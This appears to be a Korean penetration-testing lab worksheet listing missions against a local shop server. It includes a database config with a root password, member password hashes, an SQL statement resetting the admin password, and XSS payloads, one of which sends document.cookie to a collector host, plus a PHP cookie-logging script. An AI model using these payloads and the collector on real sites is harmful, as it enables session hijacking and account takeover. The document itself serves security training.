미션1
공격은 칼리를 이용
Attack.py를 이용하여 또는 완성하여
192.168.0.127를 공격
배포된 암호와 배포된 계정으로 사용자를 찾아라
1TLBB7Nz
미션2
서버가 운영중인 서비스가 무엇이며 설치된 파일의 위치는 어디인가
서비스1
서비스2
미션3
데이터베이스에 접속하라
if($connect_included) return;
$connect_included = true;
$host_name='localhost';
$user_name='root';
$db_name='shop';
$db_password='fnxm';
미션4
쇼핑몰의 관리자 암호는 무엇인가
admin | 30023cd66915635c | �������� | 1 |
| exploit | 093021136d155fe7 | ���������� | 8 |
| buycar | 1a4db7cd1cf355d5 | buycar | 1 |
| ggum | 446bcd2c0c82914f | ff | 8 |
| stu0 | 6678c4aa7dd72b33 | ���� | 8
123456
30023cd66915635c
update paran_board_member set password=password('123456') wher user_id='admin';
미션5
www서버에 모든 php 프레임워크를 찾아서 설치하기
계정은 프레임워크별로 줄것
미션5
web2.st.kr에서도 확인가능함
해커의 CSRF공격 XSS공격을 통해 관리자 쿠키 확인
script>alert('');/script>
script>location.href='https://naver.com';/script
script>alert(document.cookie);/script
script>location.href='http://192.168.0.211/cookie.php?cookie='+document.cookie/script
?php
/*$file_path = '/home/kali/public_html/cookie.txt';
$cookie = $_GET['cookie'];
// 파일 열기
$file = fopen($file_path, 'a'); // 'a' 모드는 파일을 열고, 파일이 없다면 새로 만듭니다. 파일 끝에 데이터를 추가합니다.
// 파일 열기가 성공하면 데이터 쓰기
if ($file) {
fwrite($file, $cookie . "\n"); // 쿠키 값을 파일에 추가
fclose($file); // 파일 닫기
echo "쿠키가 저장되었습니다.";
} else {
echo "파일을 열 수 없습니다.";
}
header("Location: https://daum.net");*/
?>
미션6
결제설정에 은행명과 계좌번호는 무엇인가?
워니은행 000-1111-2222-3333 (주)산특
PessionID=6636bec6c480439a7800c343a03397c8; PHPSESSID=42d3b78c899c5aa4db7ef511869a6487
create table cookie (
idx int(6),
url varchar(100)
cookie varchar(100)
reg_data TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE
PRIMARY KEY (idx)
);
제어판\시스템 및 보안\Windows Defender 방화벽\허용되는 앱
virtualbox virtual machine 활성화 확인하기